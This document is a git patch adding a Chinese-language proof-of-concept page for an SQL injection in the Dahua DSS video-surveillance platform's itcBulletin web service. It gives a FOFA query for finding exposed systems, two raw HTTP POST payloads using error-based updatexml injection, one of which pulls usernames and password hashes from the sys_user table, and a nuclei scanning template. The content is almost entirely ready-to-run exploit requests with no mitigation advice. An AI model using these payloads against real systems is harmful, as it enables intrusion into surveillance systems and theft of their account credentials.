From 5729f9565239de71e4096af8f557a2874c7d046f Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 26 Dec 2023 19:50:14 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=A4=A7=E5=8D=8EDSS=20itcBulletin=20?= =?UTF-8?q?SQL=20=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 大华DSS itcBulletin SQL 注入漏洞.md | 80 +++++++++++++++++++++++++++++ 1 file changed, 80 insertions(+) create mode 100644 大华DSS itcBulletin SQL 注入漏洞.md diff --git a/大华DSS itcBulletin SQL 注入漏洞.md b/大华DSS itcBulletin SQL 注入漏洞.md new file mode 100644 index 0000000..33e11de --- /dev/null +++ b/大华DSS itcBulletin SQL 注入漏洞.md @@ -0,0 +1,80 @@ +## 大华DSS itcBulletin SQL 注入漏洞 +大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。 + +## fofa +``` +app="dahua-DSS" +``` + +## poc +``` +POST /portal/services/itcBulletin?wsdl HTTP/1.1 +Host: x.x.x.x +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Connection: close +Content-Length: 345 +Accept-Encoding: gzip + + + + + + (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1 + + + + + + +POST /portal/services/itcBulletin?wsdl HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip + + + + + + (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1 + + + + + +``` + +## nuclei poc +``` +id: dahua-dss-itcBulletin-sqli +info: + name: 大华DSS itcBulletin SQL注入漏洞 + author: fgz + severity: high + description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。 + metadata: + fofa-query: app="dahua-DSS" + +requests: + - raw: + - |+ + POST /portal/services/itcBulletin?wsdl HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + + + + + + (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1 + + + + + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")' +```